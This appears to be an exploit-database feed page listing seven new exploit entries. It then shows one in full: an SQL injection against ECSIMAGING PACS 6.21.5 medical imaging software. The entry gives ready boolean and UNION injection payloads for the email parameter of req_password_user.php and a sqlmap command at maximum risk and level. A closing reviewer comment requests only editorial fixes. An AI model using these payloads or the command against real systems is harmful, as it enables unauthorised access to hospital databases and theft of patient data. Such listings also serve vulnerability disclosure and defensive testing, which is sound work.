
7 changes to exploits/shellcodes

iBall-Baton WRA150N Rom-0 Backup - File Disclosure (Sensitive Information)
ECSIMAGING PACS 6.21.5 - Remote code execution
Employee Record System 1.0 - Unrestricted File Upload to Remote Code Execution
Cockpit CMS 0.6.1 - Remote Code Execution
Curfew e-Pass Management System 1.0 - Stored XSS
ECSIMAGING PACS 6.21.5 - SQL injection
CRUD Operation 1.0 - Multiple Stored XSS
14 lines
No EOL
761 B
Text
# Exploit Title: ECSIMAGING PACS 6.21.5 - SQL injection
# Date: 06/01/2021
# Exploit Author: shoxxdj
# Vendor Homepage: https://www.medicalexpo.fr/
# Version: 6.21.5 and bellow ( tested on 6.21.5,6.21.3 )
# Tested on: Linux
ECSIMAGING PACS Application in 6.21.5 and bellow suffers from SQLinjection vulnerability
The parameter email is sensitive to SQL Injection (selected_db can be leaked in the parameters )
Payload example : /req_password_user.php?email=test@test.com' OR NOT 9856=9856-- nBwf&selected_db=xtp001
/req_password_user.php?email=test@test.com'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+--+&selected_db=xtp001
SQLMAP : sqlmap.py -u '<URL>/req_password_user.php?email=test@test.com&selected_db=xtp001' --risk=3 --level=5 |
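
Review bot: the Version line and the description both say "6.21.5 and bellow" but the entry names no fixed release and does not say whether req_password_user.php is reachable without authentication, so a reader cannot scope exposure from this file alone; please add both if known. In the same lines, "bellow" should be "below" and "SQLinjection" should be "SQL injection". The Date field 06/01/2021 is ambiguous between day-first and month-first; an ISO date (YYYY-MM-DD) would remove the doubt. The remark "selected_db can be leaked in the parameters" is unclear about where the value leaks from; one sentence stating where a valid selected_db value is exposed would make the prerequisite explicit.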